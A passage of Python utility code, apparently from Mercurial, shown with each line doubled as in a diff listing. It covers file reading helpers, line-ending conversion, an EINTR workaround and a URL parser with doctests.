2272 some other type of file that sometimes reads less data than is
2273 requested."""
2273 requested."""
2274 assert size >= 0
2274 assert size >= 0
2275 assert limit is None or limit >= 0
2275 assert limit is None or limit >= 0
2276 while True:
2276 while True:
2277 if limit is None:
2277 if limit is None:
2278 nbytes = size
2278 nbytes = size
2279 else:
2279 else:
2280 nbytes = min(limit, size)
2280 nbytes = min(limit, size)
2281 s = nbytes and f.read(nbytes)
2281 s = nbytes and f.read(nbytes)
2282 if not s:
2282 if not s:
2283 break
2283 break
2284 if limit:
2284 if limit:
2285 limit -= len(s)
2285 limit -= len(s)
2286 yield s
2286 yield s
2287
2287
2288 class cappedreader(object):
2288 class cappedreader(object):
2289 """A file object proxy that allows reading up to N bytes.
2289 """A file object proxy that allows reading up to N bytes.
2290
2290
2291 Given a source file object, instances of this type allow reading up to
2291 Given a source file object, instances of this type allow reading up to
2292 N bytes from that source file object. Attempts to read past the allowed
2292 N bytes from that source file object. Attempts to read past the allowed
2293 limit are treated as EOF.
2293 limit are treated as EOF.
2294
2294
2295 It is assumed that I/O is not performed on the original file object
2295 It is assumed that I/O is not performed on the original file object
2296 in addition to I/O that is performed by this instance. If there is,
2296 in addition to I/O that is performed by this instance. If there is,
2297 state tracking will get out of sync and unexpected results will ensue.
2297 state tracking will get out of sync and unexpected results will ensue.
2298 """
2298 """
2299 def __init__(self, fh, limit):
2299 def __init__(self, fh, limit):
2300 """Allow reading up to <limit> bytes from <fh>."""
2300 """Allow reading up to <limit> bytes from <fh>."""
2301 self._fh = fh
2301 self._fh = fh
2302 self._left = limit
2302 self._left = limit
2303
2303
2304 def read(self, n=-1):
2304 def read(self, n=-1):
2305 if not self._left:
2305 if not self._left:
2306 return b''
2306 return b''
2307
2307
2308 if n < 0:
2308 if n < 0:
2309 n = self._left
2309 n = self._left
2310
2310
2311 data = self._fh.read(min(n, self._left))
2311 data = self._fh.read(min(n, self._left))
2312 self._left -= len(data)
2312 self._left -= len(data)
2313 assert self._left >= 0
2313 assert self._left >= 0
2314
2314
2315 return data
2315 return data
2316
2316
2317 def readinto(self, b):
2317 def readinto(self, b):
2318 res = self.read(len(b))
2318 res = self.read(len(b))
2319 if res is None:
2319 if res is None:
2320 return None
2320 return None
2321
2321
2322 b[0:len(res)] = res
2322 b[0:len(res)] = res
2323 return len(res)
2323 return len(res)
2324
2324
2325 def unitcountfn(*unittable):
2325 def unitcountfn(*unittable):
2326 '''return a function that renders a readable count of some quantity'''
2326 '''return a function that renders a readable count of some quantity'''
2327
2327
2328 def go(count):
2328 def go(count):
2329 for multiplier, divisor, format in unittable:
2329 for multiplier, divisor, format in unittable:
2330 if abs(count) >= divisor * multiplier:
2330 if abs(count) >= divisor * multiplier:
2331 return format % (count / float(divisor))
2331 return format % (count / float(divisor))
2332 return unittable[-1][2] % count
2332 return unittable[-1][2] % count
2333
2333
2334 return go
2334 return go
2335
2335
2336 def processlinerange(fromline, toline):
2336 def processlinerange(fromline, toline):
2337 """Check that linerange <fromline>:<toline> makes sense and return a
2337 """Check that linerange <fromline>:<toline> makes sense and return a
2338 0-based range.
2338 0-based range.
2339
2339
2340 >>> processlinerange(10, 20)
2340 >>> processlinerange(10, 20)
2341 (9, 20)
2341 (9, 20)
2342 >>> processlinerange(2, 1)
2342 >>> processlinerange(2, 1)
2343 Traceback (most recent call last):
2343 Traceback (most recent call last):
2344 ...
2344 ...
2345 ParseError: line range must be positive
2345 ParseError: line range must be positive
2346 >>> processlinerange(0, 5)
2346 >>> processlinerange(0, 5)
2347 Traceback (most recent call last):
2347 Traceback (most recent call last):
2348 ...
2348 ...
2349 ParseError: fromline must be strictly positive
2349 ParseError: fromline must be strictly positive
2350 """
2350 """
2351 if toline - fromline < 0:
2351 if toline - fromline < 0:
2352 raise error.ParseError(_("line range must be positive"))
2352 raise error.ParseError(_("line range must be positive"))
2353 if fromline < 1:
2353 if fromline < 1:
2354 raise error.ParseError(_("fromline must be strictly positive"))
2354 raise error.ParseError(_("fromline must be strictly positive"))
2355 return fromline - 1, toline
2355 return fromline - 1, toline
2356
2356
2357 bytecount = unitcountfn(
2357 bytecount = unitcountfn(
2358 (100, 1 << 30, _('%.0f GB')),
2358 (100, 1 << 30, _('%.0f GB')),
2359 (10, 1 << 30, _('%.1f GB')),
2359 (10, 1 << 30, _('%.1f GB')),
2360 (1, 1 << 30, _('%.2f GB')),
2360 (1, 1 << 30, _('%.2f GB')),
2361 (100, 1 << 20, _('%.0f MB')),
2361 (100, 1 << 20, _('%.0f MB')),
2362 (10, 1 << 20, _('%.1f MB')),
2362 (10, 1 << 20, _('%.1f MB')),
2363 (1, 1 << 20, _('%.2f MB')),
2363 (1, 1 << 20, _('%.2f MB')),
2364 (100, 1 << 10, _('%.0f KB')),
2364 (100, 1 << 10, _('%.0f KB')),
2365 (10, 1 << 10, _('%.1f KB')),
2365 (10, 1 << 10, _('%.1f KB')),
2366 (1, 1 << 10, _('%.2f KB')),
2366 (1, 1 << 10, _('%.2f KB')),
2367 (1, 1, _('%.0f bytes')),
2367 (1, 1, _('%.0f bytes')),
2368 )
2368 )
2369
2369
2370 class transformingwriter(object):
2370 class transformingwriter(object):
2371 """Writable file wrapper to transform data by function"""
2371 """Writable file wrapper to transform data by function"""
2372
2372
2373 def __init__(self, fp, encode):
2373 def __init__(self, fp, encode):
2374 self._fp = fp
2374 self._fp = fp
2375 self._encode = encode
2375 self._encode = encode
2376
2376
2377 def close(self):
2377 def close(self):
2378 self._fp.close()
2378 self._fp.close()
2379
2379
2380 def flush(self):
2380 def flush(self):
2381 self._fp.flush()
2381 self._fp.flush()
2382
2382
2383 def write(self, data):
2383 def write(self, data):
2384 return self._fp.write(self._encode(data))
2384 return self._fp.write(self._encode(data))
2385
2385
2386 # Matches a single EOL which can either be a CRLF where repeated CR
2386 # Matches a single EOL which can either be a CRLF where repeated CR
2387 # are removed or a LF. We do not care about old Macintosh files, so a
2387 # are removed or a LF. We do not care about old Macintosh files, so a
2388 # stray CR is an error.
2388 # stray CR is an error.
2389 _eolre = remod.compile(br'\r*\n')
2389 _eolre = remod.compile(br'\r*\n')
2390
2390
2391 def tolf(s):
2391 def tolf(s):
2392 return _eolre.sub('\n', s)
2392 return _eolre.sub('\n', s)
2393
2393
2394 def tocrlf(s):
2394 def tocrlf(s):
2395 return _eolre.sub('\r\n', s)
2395 return _eolre.sub('\r\n', s)
2396
2396
2397 def _crlfwriter(fp):
2397 def _crlfwriter(fp):
2398 return transformingwriter(fp, tocrlf)
2398 return transformingwriter(fp, tocrlf)
2399
2399
2400 if pycompat.oslinesep == '\r\n':
2400 if pycompat.oslinesep == '\r\n':
2401 tonativeeol = tocrlf
2401 tonativeeol = tocrlf
2402 fromnativeeol = tolf
2402 fromnativeeol = tolf
2403 nativeeolwriter = _crlfwriter
2403 nativeeolwriter = _crlfwriter
2404 else:
2404 else:
2405 tonativeeol = pycompat.identity
2405 tonativeeol = pycompat.identity
2406 fromnativeeol = pycompat.identity
2406 fromnativeeol = pycompat.identity
2407 nativeeolwriter = pycompat.identity
2407 nativeeolwriter = pycompat.identity
2408
2408
2409 if (pyplatform.python_implementation() == 'CPython' and
2409 if (pyplatform.python_implementation() == 'CPython' and
2410 sys.version_info < (3, 0)):
2410 sys.version_info < (3, 0)):
2411 # There is an issue in CPython that some IO methods do not handle EINTR
2411 # There is an issue in CPython that some IO methods do not handle EINTR
2412 # correctly. The following table shows what CPython version (and functions)
2412 # correctly. The following table shows what CPython version (and functions)
2413 # are affected (buggy: has the EINTR bug, okay: otherwise):
2413 # are affected (buggy: has the EINTR bug, okay: otherwise):
2414 #
2414 #
2415 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2415 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2416 # --------------------------------------------------
2416 # --------------------------------------------------
2417 # fp.__iter__ | buggy | buggy | okay
2417 # fp.__iter__ | buggy | buggy | okay
2418 # fp.read* | buggy | okay [1] | okay
2418 # fp.read* | buggy | okay [1] | okay
2419 #
2419 #
2420 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2420 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2421 #
2421 #
2422 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2422 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2423 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2423 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2424 #
2424 #
2425 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2425 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2426 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2426 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2427 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2427 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2428 # fp.__iter__ but not other fp.read* methods.
2428 # fp.__iter__ but not other fp.read* methods.
2429 #
2429 #
2430 # On modern systems like Linux, the "read" syscall cannot be interrupted
2430 # On modern systems like Linux, the "read" syscall cannot be interrupted
2431 # when reading "fast" files like on-disk files. So the EINTR issue only
2431 # when reading "fast" files like on-disk files. So the EINTR issue only
2432 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2432 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2433 # files approximately as "fast" files and use the fast (unsafe) code path,
2433 # files approximately as "fast" files and use the fast (unsafe) code path,
2434 # to minimize the performance impact.
2434 # to minimize the performance impact.
2435 if sys.version_info >= (2, 7, 4):
2435 if sys.version_info >= (2, 7, 4):
2436 # fp.readline deals with EINTR correctly, use it as a workaround.
2436 # fp.readline deals with EINTR correctly, use it as a workaround.
2437 def _safeiterfile(fp):
2437 def _safeiterfile(fp):
2438 return iter(fp.readline, '')
2438 return iter(fp.readline, '')
2439 else:
2439 else:
2440 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2440 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2441 # note: this may block longer than necessary because of bufsize.
2441 # note: this may block longer than necessary because of bufsize.
2442 def _safeiterfile(fp, bufsize=4096):
2442 def _safeiterfile(fp, bufsize=4096):
2443 fd = fp.fileno()
2443 fd = fp.fileno()
2444 line = ''
2444 line = ''
2445 while True:
2445 while True:
2446 try:
2446 try:
2447 buf = os.read(fd, bufsize)
2447 buf = os.read(fd, bufsize)
2448 except OSError as ex:
2448 except OSError as ex:
2449 # os.read only raises EINTR before any data is read
2449 # os.read only raises EINTR before any data is read
2450 if ex.errno == errno.EINTR:
2450 if ex.errno == errno.EINTR:
2451 continue
2451 continue
2452 else:
2452 else:
2453 raise
2453 raise
2454 line += buf
2454 line += buf
2455 if '\n' in buf:
2455 if '\n' in buf:
2456 splitted = line.splitlines(True)
2456 splitted = line.splitlines(True)
2457 line = ''
2457 line = ''
2458 for l in splitted:
2458 for l in splitted:
2459 if l[-1] == '\n':
2459 if l[-1] == '\n':
2460 yield l
2460 yield l
2461 else:
2461 else:
2462 line = l
2462 line = l
2463 if not buf:
2463 if not buf:
2464 break
2464 break
2465 if line:
2465 if line:
2466 yield line
2466 yield line
2467
2467
2468 def iterfile(fp):
2468 def iterfile(fp):
2469 fastpath = True
2469 fastpath = True
2470 if type(fp) is file:
2470 if type(fp) is file:
2471 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2471 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2472 if fastpath:
2472 if fastpath:
2473 return fp
2473 return fp
2474 else:
2474 else:
2475 return _safeiterfile(fp)
2475 return _safeiterfile(fp)
2476 else:
2476 else:
2477 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2477 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2478 def iterfile(fp):
2478 def iterfile(fp):
2479 return fp
2479 return fp
2480
2480
2481 def iterlines(iterator):
2481 def iterlines(iterator):
2482 for chunk in iterator:
2482 for chunk in iterator:
2483 for line in chunk.splitlines():
2483 for line in chunk.splitlines():
2484 yield line
2484 yield line
2485
2485
2486 def expandpath(path):
2486 def expandpath(path):
2487 return os.path.expanduser(os.path.expandvars(path))
2487 return os.path.expanduser(os.path.expandvars(path))
2488
2488
2489 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2489 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2490 """Return the result of interpolating items in the mapping into string s.
2490 """Return the result of interpolating items in the mapping into string s.
2491
2491
2492 prefix is a single character string, or a two character string with
2492 prefix is a single character string, or a two character string with
2493 a backslash as the first character if the prefix needs to be escaped in
2493 a backslash as the first character if the prefix needs to be escaped in
2494 a regular expression.
2494 a regular expression.
2495
2495
2496 fn is an optional function that will be applied to the replacement text
2496 fn is an optional function that will be applied to the replacement text
2497 just before replacement.
2497 just before replacement.
2498
2498
2499 escape_prefix is an optional flag that allows using doubled prefix for
2499 escape_prefix is an optional flag that allows using doubled prefix for
2500 its escaping.
2500 its escaping.
2501 """
2501 """
2502 fn = fn or (lambda s: s)
2502 fn = fn or (lambda s: s)
2503 patterns = '|'.join(mapping.keys())
2503 patterns = '|'.join(mapping.keys())
2504 if escape_prefix:
2504 if escape_prefix:
2505 patterns += '|' + prefix
2505 patterns += '|' + prefix
2506 if len(prefix) > 1:
2506 if len(prefix) > 1:
2507 prefix_char = prefix[1:]
2507 prefix_char = prefix[1:]
2508 else:
2508 else:
2509 prefix_char = prefix
2509 prefix_char = prefix
2510 mapping[prefix_char] = prefix_char
2510 mapping[prefix_char] = prefix_char
2511 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2511 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2512 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2512 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2513
2513
2514 def getport(port):
2514 def getport(port):
2515 """Return the port for a given network service.
2515 """Return the port for a given network service.
2516
2516
2517 If port is an integer, it's returned as is. If it's a string, it's
2517 If port is an integer, it's returned as is. If it's a string, it's
2518 looked up using socket.getservbyname(). If there's no matching
2518 looked up using socket.getservbyname(). If there's no matching
2519 service, error.Abort is raised.
2519 service, error.Abort is raised.
2520 """
2520 """
2521 try:
2521 try:
2522 return int(port)
2522 return int(port)
2523 except ValueError:
2523 except ValueError:
2524 pass
2524 pass
2525
2525
2526 try:
2526 try:
2527 return socket.getservbyname(pycompat.sysstr(port))
2527 return socket.getservbyname(pycompat.sysstr(port))
2528 except socket.error:
2528 except socket.error:
2529 raise error.Abort(_("no port number associated with service '%s'")
2529 raise error.Abort(_("no port number associated with service '%s'")
2530 % port)
2530 % port)
2531
2531
2532 class url(object):
2532 class url(object):
2533 r"""Reliable URL parser.
2533 r"""Reliable URL parser.
2534
2534
2535 This parses URLs and provides attributes for the following
2535 This parses URLs and provides attributes for the following
2536 components:
2536 components:
2537
2537
2538 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2538 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2539
2539
2540 Missing components are set to None. The only exception is
2540 Missing components are set to None. The only exception is
2541 fragment, which is set to '' if present but empty.
2541 fragment, which is set to '' if present but empty.
2542
2542
2543 If parsefragment is False, fragment is included in query. If
2543 If parsefragment is False, fragment is included in query. If
2544 parsequery is False, query is included in path. If both are
2544 parsequery is False, query is included in path. If both are
2545 False, both fragment and query are included in path.
2545 False, both fragment and query are included in path.
2546
2546
2547 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2547 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2548
2548
2549 Note that for backward compatibility reasons, bundle URLs do not
2549 Note that for backward compatibility reasons, bundle URLs do not
2550 take host names. That means 'bundle://../' has a path of '../'.
2550 take host names. That means 'bundle://../' has a path of '../'.
2551
2551
2552 Examples:
2552 Examples:
2553
2553
2554 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2554 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2555 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2555 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2556 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2556 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2557 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2557 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2558 >>> url(b'file:///home/joe/repo')
2558 >>> url(b'file:///home/joe/repo')
2559 <url scheme: 'file', path: '/home/joe/repo'>
2559 <url scheme: 'file', path: '/home/joe/repo'>
2560 >>> url(b'file:///c:/temp/foo/')
2560 >>> url(b'file:///c:/temp/foo/')
2561 <url scheme: 'file', path: 'c:/temp/foo/'>
2561 <url scheme: 'file', path: 'c:/temp/foo/'>
2562 >>> url(b'bundle:foo')
2562 >>> url(b'bundle:foo')
2563 <url scheme: 'bundle', path: 'foo'>
2563 <url scheme: 'bundle', path: 'foo'>
2564 >>> url(b'bundle://../foo')
2564 >>> url(b'bundle://../foo')
2565 <url scheme: 'bundle', path: '../foo'>
2565 <url scheme: 'bundle', path: '../foo'>
2566 >>> url(br'c:\foo\bar')
2566 >>> url(br'c:\foo\bar')
2567 <url path: 'c:\\foo\\bar'>
2567 <url path: 'c:\\foo\\bar'>
2568 >>> url(br'\\blah\blah\blah')
2568 >>> url(br'\\blah\blah\blah')
2569 <url path: '\\\\blah\\blah\\blah'>
2569 <url path: '\\\\blah\\blah\\blah'>
2570 >>> url(br'\\blah\blah\blah#baz')
2570 >>> url(br'\\blah\blah\blah#baz')
2571 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2571 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2572 >>> url(br'file:///C:\users\me')
2572 >>> url(br'file:///C:\users\me')
2573 <url scheme: 'file', path: 'C:\\users\\me'>
2573 <url scheme: 'file', path: 'C:\\users\\me'>
2574
2574
2575 Authentication credentials:
2575 Authentication credentials:
2576
2576
2577 >>> url(b'ssh://joe:xyz@x/repo')
2577 >>> url(b'ssh://joe:xyz@x/repo')
2578 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2578 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2579 >>> url(b'ssh://joe@x/repo')
2579 >>> url(b'ssh://joe@x/repo')
2580 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2580 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2581
2581
2582 Query strings and fragments:
2582 Query strings and fragments:
2583
2583
2584 >>> url(b'http://host/a?b#c')
2584 >>> url(b'http://host/a?b#c')
2585 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2585 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2586 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2586 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2587 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2587 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2588
2588
2589 Empty path:
2589 Empty path:
2590
2590
2591 >>> url(b'')
2591 >>> url(b'')
2592 <url path: ''>
2592 <url path: ''>
2593 >>> url(b'#a')
2593 >>> url(b'#a')
2594 <url path: '', fragment: 'a'>
2594 <url path: '', fragment: 'a'>
2595 >>> url(b'http://host/')
2595 >>> url(b'http://host/')
2596 <url scheme: 'http', host: 'host', path: ''>
2596 <url scheme: 'http', host: 'host', path: ''>
2597 >>> url(b'http://host/#a')
2597 >>> url(b'http://host/#a')
2598 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2598 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2599
2599
2600 Only scheme:
2600 Only scheme:
2601
2601
2602 >>> url(b'http:')
2602 >>> url(b'http:')
2603 <url scheme: 'http'>
2603 <url scheme: 'http'>
2604 """
2604 """
2605
2605
2606 _safechars = "!~*'()+"
2606 _safechars = "!~*'()+"
2607 _safepchars = "/!~*'()+:\\"
2607 _safepchars = "/!~*'()+:\\"
2608 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2608 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2609
2609
2610 def __init__(self, path, parsequery=True, parsefragment=True):
2610 def __init__(self, path, parsequery=True, parsefragment=True):
2611 # We slowly chomp away at path until we have only the path left
2611 # We slowly chomp away at path until we have only the path left
2612 self.scheme = self.user = self.passwd = self.host = None
2612 self.scheme = self.user = self.passwd = self.host = None
2613 self.port = self.path = self.query = self.fragment = None
2613 self.port = self.path = self.query = self.fragment = None
2614 self._localpath = True
2614 self._localpath = True
2615 self._hostport = ''
2615 self._hostport = ''
2616 self._origpath = path
2616 self._origpath = path
2617
2617
2618 if parsefragment and '#' in path:
2618 if parsefragment and '#' in path:
2619 path, self.fragment = path.split('#', 1)
2619 path, self.fragment = path.split('#', 1)
2620
2620
2621 # special case for Windows drive letters and UNC paths
2621 # special case for Windows drive letters and UNC paths
2622 if hasdriveletter(path) or path.startswith('\\\\'):
2622 if hasdriveletter(path) or path.startswith('\\\\'):
2623 self.path = path
2623 self.path = path
2624 return
2624 return
2625
2625
2626 # For compatibility reasons, we can't handle bundle paths as
2626 # For compatibility reasons, we can't handle bundle paths as
2627 # normal URLS
2627 # normal URLS
2628 if path.startswith('bundle:'):
2628 if path.startswith('bundle:'):
2629 self.scheme = 'bundle'
2629 self.scheme = 'bundle'
2630 path = path[7:]
2630 path = path[7:]
2631 if path.startswith('//'):
2631 if path.startswith('//'):
2632 path = path[2:]
2632 path = path[2:]
2633 self.path = path
2633 self.path = path
2634 return
2634 return
2635
2635
2636 if self._matchscheme(path):
2636 if self._matchscheme(path):
2637 parts = path.split(':', 1)
2637 parts = path.split(':', 1)
2638 if parts[0]:
2638 if parts[0]:
2639 self.scheme, path = parts
2639 self.scheme, path = parts
2640 self._localpath = False
2640 self._localpath = False
2641
2641
2642 if not path:
2642 if not path:
2643 path = None
2643 path = None
2644 if self._localpath:
2644 if self._localpath:
2645 self.path = ''
2645 self.path = ''
2646 return
2646 return
2647 else:
2647 else:
2648 if self._localpath:
2648 if self._localpath:
2649 self.path = path
2649 self.path = path
2650 return
2650 return
2651
2651
2652 if parsequery and '?' in path:
2652 if parsequery and '?' in path:
2653 path, self.query = path.split('?', 1)
2653 path, self.query = path.split('?', 1)
2654 if not path:
2654 if not path:
2655 path = None
2655 path = None
2656 if not self.query:
2656 if not self.query:
2657 self.query = None
2657 self.query = None
2658
2658
2659 # // is required to specify a host/authority
2659 # // is required to specify a host/authority
2660 if path and path.startswith('//'):
2660 if path and path.startswith('//'):
2661 parts = path[2:].split('/', 1)
2661 parts = path[2:].split('/', 1)
2662 if len(parts) > 1:
2662 if len(parts) > 1:
2663 self.host, path = parts
2663 self.host, path = parts
2664 else:
2664 else:
2665 self.host = parts[0]
2665 self.host = parts[0]
2666 path = None
2666 path = None
2667 if not self.host:
2667 if not self.host:
2668 self.host = None
2668 self.host = None
2669 # path of file:///d is /d
2669 # path of file:///d is /d
2670 # path of file:///d:/ is d:/, not /d:/
2670 # path of file:///d:/ is d:/, not /d:/
2671 if path and not hasdriveletter(path):
2671 if path and not hasdriveletter(path):
2672 path = '/' + path
2672 path = '/' + path
2673
2673
2674 if self.host and '@' in self.host:
2674 if self.host and '@' in self.host:
2675 self.user, self.host = self.host.rsplit('@', 1)
2675 self.user, self.host = self.host.rsplit('@', 1)
2676 if ':' in self.user:
2676 if ':' in self.user:
2677 self.user, self.passwd = self.user.split(':', 1)
2677 self.user, self.passwd = self.user.split(':', 1)
2678 if not self.host:
2678 if not self.host:
2679 self.host = None
2679 self.host = None
2680
2680
2681 # Don't split on colons in IPv6 addresses without ports
2681 # Don't split on colons in IPv6 addresses without ports
2682 if (self.host and ':' in self.host and
2682 if (self.host and ':' in self.host and
2683 not (self.host.startswith('[') and self.host.endswith(']'))):
2683 not (self.host.startswith('[') and self.host.endswith(']'))):
2684 self._hostport = self.host
2684 self._hostport = self.host
2685 self.host, self.port = self.host.rsplit(':', 1)
2685 self.host, self.port = self.host.rsplit(':', 1)
2686 if not self.host:
2686 if not self.host:
2687 self.host = None
2687 self.host = None
2688
2688
2689 if (self.host and self.scheme == 'file' and
2689 if (self.host and self.scheme == 'file' and
2690 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2690 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2691 raise error.Abort(_('file:// URLs can only refer to localhost'))
2691 raise error.Abort(_('file:// URLs can only refer to localhost'))
2692
2692
2693 self.path = path
2693 self.path = path
2694
2694
2695 # leave the query string escaped
2695 # leave the query string escaped
2696 for a in ('user', 'passwd', 'host', 'port',
2696 for a in ('user', 'passwd', 'host', 'port',
2697 'path', 'fragment'):
2697 'path', 'fragment'):
2698 v = getattr(self, a)
2698 v = getattr(self, a)
2699 if v is not None:
2699 if v is not None:
2700 setattr(self, a, urlreq.unquote(v))
2700 setattr(self, a, urlreq.unquote(v))
2701
2701
2702 @encoding.strmethod
2702 @encoding.strmethod
2703 def __repr__(self):
2703 def __repr__(self):
2704 attrs = []
2704 attrs = []
2705 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2705 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2706 'query', 'fragment'):
2706 'query', 'fragment'):
2707 v = getattr(self, a)
2707 v = getattr(self, a)
2708 if v is not None:
2708 if v is not None:
2709 attrs.append('%s: %r' % (a, v))
2709 attrs.append('%s: %r' % (a, v))
2710 return '<url %s>' % ', '.join(attrs)
2710 return '<url %s>' % ', '.join(attrs)
2711
2711
2712 def __bytes__(self):
2712 def __bytes__(self):
2713 r"""Join the URL's components back into a URL string.
2713 r"""Join the URL's components back into a URL string.
2714
2714
2715 Examples:
2715 Examples:
2716
2716
2717 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2717 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2718 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2718 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2719 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2719 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2720 'http://user:pw@host:80/?foo=bar&baz=42'
2720 'http://user:pw@host:80/?foo=bar&baz=42'
2721 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2721 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2722 'http://user:pw@host:80/?foo=bar%3dbaz'
2722 'http://user:pw@host:80/?foo=bar%3dbaz'
2723 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2723 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2724 'ssh://user:pw@[::1]:2200//home/joe#'
2724 'ssh://user:pw@[::1]:2200//home/joe#'
2725 >>> bytes(url(b'http://localhost:80//'))
2725 >>> bytes(url(b'http://localhost:80//'))
2726 'http://localhost:80//'
2726 'http://localhost:80//'
2727 >>> bytes(url(b'http://localhost:80/'))
2727 >>> bytes(url(b'http://localhost:80/'))
2728 'http://localhost:80/'
2728 'http://localhost:80/'
2729 >>> bytes(url(b'http://localhost:80'))
2729 >>> bytes(url(b'http://localhost:80'))
2730 'http://localhost:80/'
2730 'http://localhost:80/'
2731 >>> bytes(url(b'bundle:foo'))
2731 >>> bytes(url(b'bundle:foo'))
2732 'bundle:foo'
2732 'bundle:foo'
2733 >>> bytes(url(b'bundle://../foo'))
2733 >>> bytes(url(b'bundle://../foo'))
2734 'bundle:../foo'
2734 'bundle:../foo'
2735 >>> bytes(url(b'path'))
2735 >>> bytes(url(b'path'))
2736 'path'
2736 'path'
2737 >>> bytes(url(b'file:///tmp/foo/bar'))
2737 >>> bytes(url(b'file:///tmp/foo/bar'))
2738 'file:///tmp/foo/bar'
2738 'file:///tmp/foo/bar'
2739 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2739 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2740 'file:///c:/tmp/foo/bar'
2740 'file:///c:/tmp/foo/bar'
2741 >>> print(url(br'bundle:foo\bar'))
2741 >>> print(url(br'bundle:foo\bar'))
2742 bundle:foo\bar
2742 bundle:foo\bar
2743 >>> print(url(br'file:///D:\data\hg'))
2743 >>> print(url(br'file:///D:\data\hg'))
2744 file:///D:\data\hg
2744 file:///D:\data\hg
2745 """
2745 """
2746 if self._localpath:
2746 if self._localpath:
2747 s = self.path
2747 s = self.path
2748 if self.scheme == 'bundle':
2748 if self.scheme == 'bundle':
2749 s = 'bundle:' + s
2749 s = 'bundle:' + s
2750 if self.fragment:
2750 if self.fragment:
2751 s += '#' + self.fragment
2751 s += '#' + self.fragment
2752 return s
2752 return s
2753
2753
2754 s = self.scheme + ':'
2754 s = self.scheme + ':'
2755 if self.user or self.passwd or self.host:
2755 if self.user or self.passwd or self.host:
2756 s += '//'
2756 s += '//'
2757 elif self.scheme and (not self.path or self.path.startswith('/')
2757 elif self.scheme and (not self.path or self.path.startswith('/')
2758 or hasdriveletter(self.path)):
2758 or hasdriveletter(self.path)):
2759 s += '//'
2759 s += '//'
2760 if hasdriveletter(self.path):
2760 if hasdriveletter(self.path):
2761 s += '/'
2761 s += '/'
2762 if self.user:
2762 if self.user:
2763 s += urlreq.quote(self.user, safe=self._safechars)
2763 s += urlreq.quote(self.user, safe=self._safechars)
2764 if self.passwd:
2764 if self.passwd:
2765 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
